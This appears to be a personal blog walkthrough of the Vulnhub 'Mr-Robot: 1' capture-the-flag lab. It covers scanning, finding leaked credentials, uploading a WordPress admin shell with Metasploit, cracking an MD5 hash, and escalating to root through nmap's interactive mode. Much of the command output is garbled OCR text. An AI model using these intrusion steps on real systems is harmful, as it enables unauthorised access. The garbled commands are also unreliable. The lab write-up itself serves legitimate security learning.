CTF 1- Vulnhub “Mr-Robot: 1” walkthrough

Howard Mukanda Security November 8, 2016

This is my first writeup for a Vulnhub CTF and my first complete CTF project with documentation. Please note that it took me days to complete this- with a lot of research on the internet.

Although Jason said this was beginner level, It sure challenged me and helped me to get more comfortable with my skills

Now, let the fun begin!

We start with nmap to see which ports and services are running and can be exploited.

There, so we have ports 80 and 443 which are hosting webpages. Time to find out more .

Going to the webpage we find this message from Mr Robot, the TV series:

There is nothing here except some photos and videos from Mr Robot the TV Show (if youre a fan of the show you will get a kick from the memes and videos)

Now I moved on to Nikto to really find out whats going on with this website

$Machine generated alternative text: nikto -h 192.168. - Nikto v2.1.6 Target IP: 192.168. Target Hostname: 192.168. Target Port: 80 + Start Time: + Server: Apache 2.41 2.41 2.41 2016-11-07 (GMT-5) The X-XSS-Protection header is not defined. This header can hint to the user a gent to protect against some forms of XSS The X-Content-Type-0ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type Retrieved x-powered-by header: PHP/5.5.29 No CGI Directories found (use '-C all' to force check all possible dirs) Server leaks inodes via ETags, header found with file / robots. txt, fields: Ox2 g Ox52467010ef8ad Uncommon header tcn found, with contents: list Apache mod _ negotiation is enabled with MultiViews, which allows attackers to e asily brute force file names. See http://\"ww.wisec.it/sectou.php?id=4698ebdc59d1 5. The following alternatives for 'index' were found: index.html, index.php + OSVDB-3092: /admin/: This might be interesting.. Uncommon header 'link' found, with contents: <http://192.168.2.41/?p=23>; rel= short link$

So, here I wasted time trying to log into the wordpress site, I couldn’t figure out the password, then I decided to find the robots.txt file found by nikto

Andddddd… Boom!

Machine generated alternative text: C 0 0 192.168.2.41/robots.txt User-agent: fsocity . dic key-I-of -3. txt

Quick check of key-1-of-3.txt file reveals that key-1-of-3.txt = 073403c8a58a1f80d943455fb30724b9 our first Key

Machine generated alternative text: C 0 0 192.168.2.41/key-1-of-3.txt e734ø3c8a58a1f8ød943455fb3a724b9

The .dic file has a lot of duplicates so it needs to be cleaned. But, after some time, I decided to go for the ol wordpress default readme.html and sure enough, there is something there:

Now we know the version is 4.3.6.

Now I needed to download the dictionary file and clean it up.

Machine generated alternative text: rootaa L 1 . # wget --2016-11-07 Tsoclty.dlc http://192.168.2.41/fsocity.dic Connecting to 192.168.2.41:80... connected. HTTP request sent, awaiting response... 200 OK Length: 7245381 (6.9M) [text/x-c] Saving to: 'fsocity.dlc fsocity.dic 2016-11-07 (11.7 MB/s) - 6.91M 11.7MB/s in 0.6s 'fsocity.dic' saved [7245381/7245381]

$C:\506D1A25\5417D462-BA96-4DA5-916B-DFC5CDCFE8E0_files\image008.png$

Now its time to bruteforce the directories on this site with wfuzz

We get:

Machine generated alternative text: Lines 00290: 27 w 02757: Response c=200 c=404 Word 156 137 464 W Chars 309 ch 8265 ch " license • "Officer •

Nikto above also found a license.txt file. Further looking at that we get this insult:

Machine generated alternative text: C 0 0 192.168.241/Iicense what you do just pull code from Rapid9 or some since when did you become a script kitty?

We scroll all the way down this page and we get this base 64.

ZWxsaW90OkVSMjgtMDY1Mgo=

We decode this base 64 online at https://www.base64decode.org/ and we get these results:

elliot:ER28-0652

Bam!!, now we have some credentials to work with. From Nikto results above, we know the wordpress site login url is /wp-admin, so we go there and login.

Here, I chose to upload an admin shell, now that i know that these credentials work. Metasploit will get this done fast.

Machine generated alternative text: msf USERNAME msf PASSWORD ER28-0652 msf RHOST 192.168.2.41 msf upload upload upload upload > set USERNAME elliot > set PASSWORD ER28-0652 > set RHOST 192.168.2.41 exploit' >

Ok, this failed the first time, so we are not detecting our wordpress site, commenting out the failure line in exploit (use

root@kali:~# gedit /usr/share/metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb)

seem to fix this issue:

$Machine generated alternative text: *wp-admin-shell-upload.rb lusr/sharel metas p loit- framework}modules/exp loits/un ix/webapp def generate_plugin(plugin_name, payload _ name) plugin _ script = %Q{<?php * Plugin Name: #{plugin_name} * Version: #{Rex: : Text. rand_text_numeric(1)}.#{Rex: : Text. rand_text_numeric(l)}.# {Rex: : Text. rand text numeric(2)} * Author: : Teit. rand _ text alpha(10)} * Author URI: http://#{Rex: : Text. * License: GPL2 = Rex: :Zip: :Archive.new(Rex: :Zip: :CM_STORE) ZIP zlp.add name}.php" , addZf ile( . php " , ZIP. ZIP end def exploit plugin _ script) payload . encoded) •fail with(Failure: :NotFound, 'The target does not appear to be using WordPress' unless wordpress and online? print_status("Authenticating with WordPress using ' cookie = wordpress_login(username, password) fail with(Faiture: :NoAccess, Failed to authenticate with if cookie. WordPress Ln 69, col 115 nil? print_good("Authenticated with WordPress" Ruby Tab Width: 8$

Now we are in!

Poking around, lets see what we can find:

And we have an MD hash- C3fcd3d76192e4007dfb496cca67e13b with username robot.

Machine generated alternative text: meterpreter > key-2-of-3.txt Unknown command: key-2-of-3. txt. meterpreter > cat key-2-of-3.txt core _ channel _ open: Operation failed: meterpreter > cat key-2-of-3.txt core _ channel _ open: Operation failed: meterpreter > cat password. raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b meterpreter > 1 1

Using online cracks, we found the password as abcdefghijklmnopqrstuvwxyz. Stupid password right? Well, we got it.

Now, lets get the coveted shell.

Machine generated alternative text: python -c 'import Pty; ' $ su robot su robot Password: abcdefghijklmnopqrstuvwxyz

And we are in , here is the second key!

Machine generated alternative text: Is -a key-2-of-3.txt password . raw-md5 cat key-2-of-3.txt cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 robot@linux:

Ok, now, we need to find the 3rd key. The third key must be in the root file, so we need to escalate the privileges to root (This was a learning curve for me. I took a break, went to bed and woke up at 5am to work on this.

I didn’t know what I was looking for till I remembered NMAP! And nmap is running as ROOT! Wow, so that’s our in.

From here I decided to log straight into the VM, not via kali since I had robot’s credentials from above and run interactive nmap.

Machine generated alternative text: -interactive nmaß Starting nmap V. S. Bl ( insecure.org/nmag/ Ralcome to interactive Mode press h for he I Q nmag>

Look at this beauty! We love interactive shell! And we got our 3rd key!

This was fun.

I like the show Mr Robot and it was fun completing this CTF. I enjoy these CTF challenges and i will be posting more solutions here.

CTF 1- Vulnhub “Mr-Robot: 1” walkthrough

About: Howard Mukanda